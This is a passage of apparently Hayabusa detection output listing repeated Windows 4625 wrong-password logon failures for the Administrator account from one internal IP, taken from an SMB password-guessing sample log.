192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.245 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.422 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.601 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.681 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.730 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.780 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.916 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.961 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.006 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.157 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.202 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.243 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.289 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.329 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.445 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.489 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.535 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.645 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.747 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.889 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:37.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.057 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.094 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.142 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.177 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.257 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.393 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.623 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.857 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.975 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.022 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPTyAkYjcIlko5lu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.155 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OjlRoo9Sot4Fx4Th | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.205 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: XslY26kw2aBw19D8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.242 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1404fakprYeqGiNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.281 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2VfIjtBcXCRlOjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.317 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPztyX4J9NV8EldT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 07flrrzWgsVBYaN2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vgkqkC1VvznGxR6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.461 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: hMn6yDMLgLChJTL6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.501 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uSTokOJ31Tj0bLXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.534 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyRifC46GrNpTA4x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.577 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvNaby30vAT9drAX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wkYSOQ2bD51a4U8l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rqdOquL9Ax01RPPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.705 
